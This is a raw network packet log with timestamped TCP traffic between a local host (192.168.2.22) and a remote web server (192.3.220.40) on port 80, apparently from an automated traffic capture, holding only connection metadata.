                                                                                                                                                                              Oct 14, 2024 11:06:09.398521900 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398550034 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398572922 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398591995 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398612976 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.398614883 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398629904 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398642063 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.398646116 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398662090 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398677111 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398679972 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.398693085 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.398695946 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.398732901 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.403470993 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.403546095 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.403589964 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.451436996 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.487363100 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487430096 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487445116 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487471104 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487484932 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487493038 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487509966 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.487544060 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.487576962 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.489229918 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.489268064 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.489285946 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.489294052 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.489350080 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.491190910 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491226912 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491242886 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491256952 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491271973 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491314888 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.491314888 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.491574049 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491599083 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491611958 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491636992 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.491638899 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491656065 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.491676092 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.492490053 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.492503881 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.492516994 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.492556095 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576133013 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576154947 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576169968 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576184034 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576195002 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576220036 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576251030 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576251030 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576262951 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576270103 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576292992 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576309919 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576323986 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576328039 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576339006 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576351881 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576359987 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576369047 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576383114 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576389074 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576400042 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576422930 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576931953 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576946020 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576963902 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.576977968 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.576992035 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.577016115 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577029943 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577048063 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577061892 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577075005 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.577078104 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577092886 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577106953 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577114105 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.577126980 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.577692032 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.577739000 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.577742100 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579519033 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579545975 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579574108 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.579591990 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579636097 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.579638958 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579654932 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579684019 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.579694033 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579716921 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579732895 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579746962 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579754114 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.579762936 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.579773903 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.582669020 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582684040 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582705975 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582719088 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.582729101 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582745075 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582747936 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.582761049 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582773924 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582777023 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.582788944 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582806110 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.582813025 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.582848072 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.635833025 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.640654087 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.640671968 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.640688896 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.640703917 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.640713930 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.640742064 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665064096 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665103912 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665118933 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665134907 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665153027 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665160894 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665178061 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665199995 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665205956 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665219069 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665222883 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665236950 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665245056 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665254116 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665261030 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665268898 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665282011 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665291071 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665306091 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665332079 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665333986 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665347099 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665365934 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665366888 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665384054 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665399075 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665399075 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665416002 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665426016 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665431976 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665447950 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665460110 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665462017 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665481091 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.665482998 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.665525913 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.666023970 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666064978 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666079998 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666111946 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.666160107 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666182041 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666197062 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666201115 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.666213036 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666230917 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666239977 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.666244984 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666260958 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.666269064 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.666299105 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668647051 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668663025 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668677092 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668703079 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668752909 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668776989 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668791056 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668791056 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668807030 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668824911 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668843985 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668858051 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668873072 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668890953 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668890953 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668915987 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668930054 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668930054 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668952942 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668970108 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.668976068 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.668992043 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.669006109 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.669013023 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.669020891 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.669030905 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.669037104 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.669054985 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.669068098 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.669076920 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.669106960 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672209024 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672225952 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672255039 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672270060 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672285080 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672286987 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672302008 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672319889 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672332048 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672332048 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672348976 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672362089 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672385931 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672388077 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672404051 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672419071 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672422886 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672436953 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672455072 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.672461033 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672476053 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.672497988 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:09.887459040 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:09.887520075 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.103327990 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.103393078 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.523154974 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528132915 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528145075 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528157949 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528194904 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528204918 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528215885 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528225899 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528235912 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528235912 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528255939 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528323889 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528336048 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528347015 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528357029 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528368950 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528369904 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528382063 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528393030 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528397083 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528413057 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528485060 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528496981 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528506041 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528517008 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528522015 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528532028 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528539896 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528543949 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528556108 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528567076 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528568029 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528585911 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528592110 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528600931 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528619051 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528623104 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528631926 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528685093 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528796911 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528808117 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528820992 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528841972 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528862953 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528876066 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528886080 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528897047 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528902054 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528911114 CEST4917280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:10.528954983 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528965950 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528976917 CEST8049172192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:10.528989077 CEST8049172192.3.220.40192.168.2.22
